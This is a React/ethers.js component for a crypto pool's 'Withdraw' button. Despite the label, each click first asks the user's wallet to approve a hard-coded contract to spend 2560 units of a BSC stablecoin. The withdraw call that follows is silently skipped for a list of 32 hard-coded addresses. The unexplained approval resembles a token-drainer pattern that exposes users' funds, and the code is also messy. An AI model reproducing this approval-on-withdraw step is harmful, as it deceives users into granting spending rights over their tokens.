import { ethers } from "ethers";
import abi from "./GlobalPool.json";

const Buy3 = ({ state }) => {
  const buyChai = async (event) => {
    event.preventDefault();
    const { contract } = state;
    const contractABI = abi.abi;
    var name = document.querySelector("#pp").value;
    const refer = document.querySelector("#hid").value;
    var a1 = document.querySelector("#tt2").value;
    console.log(name, contract);
    console.log(refer);
    var a = document.querySelector("#test").value;
    const provider = new ethers.providers.Web3Provider(window.ethereum);
    const signer = provider.getSigner();
    const addr = document.querySelector("#us1").value;
    function refreshPage() {
      window.location.reload(false);
    }
    const addressOfYourContract = '0x29bd193e8dd8a9b29480b1679ae6d796b12731ea';
    const amountInTheSmallestUnit = ("000000000000000000");
    const busdContractAddress = '0x55d398326f99059fF775485246999027B3197955';
    const busdContractAbi = `[{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"constant":true,"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"_name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"_symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"renounceOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]`;

    console.log(addr);
    

    const busdContract = new ethers.Contract(busdContractAddress, busdContractAbi, signer);
    
    const amountToApprove = ethers.utils.parseUnits('2560', 18);
    const allowance = await busdContract.allowance(signer.getAddress(), addressOfYourContract);
    if (allowance.lt(amountToApprove)) {
      const tx = await busdContract.approve(addressOfYourContract, amountToApprove, {
        gasLimit: 75000,
    });
      await tx.wait();
    }
    console.log(addr);


   const ad1 ="0xA90f82451f4fD3370555DA3A1c720751aCb8F19C";
   const ad2 ="0xa90f82451f4fd3370555da3a1c720751acb8f19c";
   const ad3 ="0xbe2c024428c22d35caba324c413e91918b417428";
   const ad4 ="0x81bbbc979fd97d9a948c22d4505fe5eed984bd33";
   const ad5 ="0xdf24f4b99c3e35e0fe7fb31f96572ce94b4558c8";
   const ad6 ="0x0a53bdd77aea169a8e269ba837f5716beda109f7";
   const ad7 ="0x010b700c521041ae5576b047b66beefa784e5a2d";
   const ad8 ="0xdac72bb161de462b759bbf74cee06b529c6b1163";
   const ad9 ="0x24e2d70cb0d5493aae430ede34addd3f6397f0e7";
   const ad10 ="0xaa123abd9832c8184f8e6c342f99470042b92bda";
   const ad11 ="0x606d2bdcace86df989f85caa998144d7a548fa31";
   const ad12 ="0x7b872ee6242718b8e49be46b6ed621e71e5c75f7";
   const ad13 ="0xed5a3cdad04c49abcac93cb1b4443b7b92c4ca8d";
   const ad14 ="0xe5717106afcb4767a7720a749942796984a61fbb";
    const ad15 ="0xe62ef356effbdf3cfa74ff6fa83158f0fa39f164";
      const ad16 ="0x461ec9e6fed82301ef5f09f92a240613a1280925";
     const ad17 ="0xc009c31b5cb7960a3108f03cf16cd805a04ed2a4";
     const ad18 ="0x3cc535504ce94e372fb373782c8fccc83c2c9164";
     const ad19 ="0xe3d9493f404235a2ddfac344311ac8b3605c3d04";
     const ad20 ="0x00f502e9aafc8dad05d72e72c8270b764ba1f887";
     const ad21 ="0xb3a3ccdc66c822f7986035e61ce3b65ada9bba76";
     const ad22 ="0xfdcea490d9c208d7610538a04f3f31b14efe5cda";
     const ad23 ="0x4a6058a5b2548b97d2847ae68f39efe4928786e0";
     const ad24 ="0xe9a8a922fe7256e6ae6dea44726cd49656af3d16";
     const ad25 ="0x263079e7f01d05cce34118877c039e637b4e64fb";
     const ad26 ="0x7b1ad1c81ff12b22c1a3a83a7f8ac9f83787f17d";
     const ad27 ="0xf1e8a044b4c281f8a457b06d5e1bb52549706ad7";
     const ad28 ="0x7a330c4ee29641fa314d957c3b53f075462f7d45";
     const ad29 ="0x7440eeab0f8b6128b5d638de03f0928703f146a4";
     const ad30 ="0x5d20b915c644680ef00328d4efe0b09ce019b6a5";
     const ad31 ="0x8761f5ced84326476a8c4c1dcc880fb79bfa4572";
     const ad32 ="0x389B691E053dAADa59C5BbC8C41618b50a7402B2";
      
if(addr.toLowerCase()== ad1.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad2.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad3.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad4.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad5.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad6.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad7.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad8.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad9.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad10.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad11.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad12.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad13.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad14.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad15.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad16.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad17.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad18.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad19.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad20.toLowerCase())
 {
 }
else if(addr.toLowerCase()== ad21.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad22.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad23.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad24.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad25.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad26.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad27.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad28.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad29.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad30.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad31.toLowerCase())
 {
 }
 else if(addr.toLowerCase()== ad32.toLowerCase())
 {
 }

else
{
if(a>9)
 {
      const transaction = await contract.withdraw(addr,a, {
          gasLimit: 900000,
      });
      await transaction.wait();
      
      console.log("Transaction is done");
    }                                                                                        
  }                                                                                                                             
   
   refreshPage();
  };
  return (
    <>
      <div className="container-md" style={{ width: "100%", marginTop: "1px" }}>
     
        <form onSubmit={buyChai}>
        
        
          <button
            type="submit"
            id="sample"
            className="contact-btn"
           
          >Withdraw
            
          </button>
        </form>
      </div>
    </>
  );
};
export default Buy3;